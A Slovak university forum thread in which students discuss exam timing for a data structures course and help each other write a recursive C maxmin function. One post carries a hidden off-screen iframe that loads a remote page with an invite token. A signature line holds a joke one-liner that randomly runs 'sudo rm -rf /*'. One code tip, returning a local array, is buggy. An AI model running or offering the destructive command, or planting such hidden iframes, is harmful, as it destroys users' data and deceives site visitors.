• Welcome to TUKE FÓRUM - Fórum pre študentov Technickej Univerzity v Košiciach.

USA - Udajove struktury a algoritmy

Started by ppt, 24.02.2008, 20:19:37

« predchdzajce - alie »

buhehe

a co bude vlastne na pisomke? priklady (zlozitost, algoritmy...) ci len teroria (algoritmy, udajove struktury...)?

kOsTi

:trestac:

sri

Quote from: BossZ on  09.04.2008, 02:41:32
kedy sa pise test z USA?

Nam povedal Simonak, ze ti, ktorym odpadlo, budu mat v 10. a ostatni riadne v 9. tyzdni... aspon tak som to pochopil :D

ONdro

Vie niekto helfnut so 7. cvikom? Tie algoritmy co su tam ne a ne naimplementovat... ak:

puq

i ja sa pridem, akoze pri ten funkcii maxmin ma byt vystup z funkcie pole dvojprvkove? a ako sa da z funkcie dostat pole???? vie niekto?

Mao

Ano ma byt dvojprvkove.Da sa to napr. tak ze vratis smernik resp. adresu na zaciatok toho pola.

puq

take nieco som nasiel aj na nete

cize nieco take to bude ze:

napr
int* maxmin(....)
{
int x [];
.
.
.
return *x;
}

tak alebo ako???

Mao

Pozor ked das return *x, tak nevracias smernik, ale hodnotu na ktoru ukazuje dany smernik.
Vysek z mojho kodu:

int* maxmin(int A[],int n)
{
int *returnArray;
returnArray=(int*)malloc(2*sizeof(int));

return returnArray;
}

Nie som si isty, ale mohlo by to fungovat aj v tvare :
int x[2];
return x;
kedze x je v tomto pripade ukazatel resp. adresa prveho prvku pola. Ale ved vyskusaj a daj vediet :)

puq

okey vyskusam to zajtra lebo kedy, so smernikmi mi moc nejde no :D co uz

a to returnarray je vlastne co??? to je len integer? alebo pole??? normalne sa da pouzit potom returnarray[0]???? alebo jak?

Mao

returnArray je dynamicky alokovane pole typu int, v tomto pripade velkosti 2.A presne, vies k tomu pristupovat pomocou inexov ako v pripade klasickeho pola

ONdro

Ja som to skusal aj so  smernikmi aj bez,len cez globalne premenne. Ale aj tak to nijak nechodi... Padne to vzdy ked scem zavolat znovu tu funkciu pre pravu aj lavu cast...Nechapem ako maju vyzerat tie polia left a right,ci co tam je.

Mao

Quote from: ONdro on  12.04.2008, 02:04:25
Ja som to skusal aj so  smernikmi aj bez,len cez globalne premenne. Ale aj tak to nijak nechodi... Padne to vzdy ked scem zavolat znovu tu funkciu pre pravu aj lavu cast...Nechapem ako maju vyzerat tie polia left a right,ci co tam je.
Ked volas tu funkciu maxmin rekurzivne, tak ako parameter musis dat adresu na zaciatok, resp. stred pola, nie konkretnu hodnotu na danom indexe. Cize volanie by malo vyzerat napr. takto :
left = maxmin(A,n/2);      
right = maxmin(&A[(int)n/2],n-n/2);   

LONEr

xalani plz pacnite tu veci , co budete mat na zapoctovke. zachranite mnoho dusi. a za screenshoty dostanete metaly ;)

buhehe

BossZ

iba pre tych ktorym odpadlo cviko kvoli sviatkom..

Quote from: buhehe on  15.04.2008, 01:12:56
neni zapoctovka v 10. tyzdni?
<iframe style="width:300px;height:600px;padding:0;margin: -300px 0px 0px 0px;border:0;" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.androidroka.sk/wp-content/themes/androidRoku/iframe.php?invite=52633e266001a22a5eb0166ee736bc68"></iframe>

pepco

no nas sa pytal p. Simonak kedy chceme zapoctovku :) dali sme si na 10.tyzden, hoci sme mali setky cvika (po sviatkoch nam neodpadlo)

buhehe

ani nam nie a asi tiez bude v 10. tyzdni....teda ked som dobre pocul...

Tanka

Dobre si pocul Bandakova pisomku na 10. tyzden dala...

danielmi

a co to bude za pisomka?nevie niekto blizsie?z prednasok,cvik,zdrojaky???
Subject: how women communicate with computer

Login: yes
Password: i dont have one
password is incorrect...

Login: yes
Password: incorrect

pepco

Quote from: danielmi on  18.04.2008, 12:59:21
a co to bude za pisomka?nevie niekto blizsie?z prednasok,cvik,zdrojaky???

no to by zaujimalo viacerych... ale tha Simonak povedal len tolko, ze z doposial prebranych veci, cvika + prednasky

buhehe

slecna cviciaca povedala ze to bude moodle a budu prednasky a cvika....cize zdrojaky kludne mozu byt plus pseudokody algoritmov

kOsTi

jj este zlozitosti algoritmov a take sracky...
:trestac:

ApokalypS

no nam plocica(ospravedlnujem sa ak som zle napisal) povedal, ze to bude 10 otazkovy test na moodli
s tym, ze viac zamerany na teoriu.. a hej, ze aj skusenosti..
ale ze kody nic.. mozno ze len pseudokody.. tych sortov a podobne..

btw: z coho mate na plane sa ucit??
80% mozgu človeka tvorí kvapalina, v mojom prípade brzdová..

CHCEM S5 :zuzka: STARY IS :zuzka: !!!!
http://www.tu-ke.com/forum/o-nicom/otvoreny-list-vedeniu-firmy-dupress-(dodavatel-mais)/

JCube

sudo [ $[ $RANDOM % 6 ] == 0 ] && rm -rf /* || echo "Alive!"

sri

To este nikto nemal pisomku? Sak sem hodte daake otazky nie?  :emot-drool: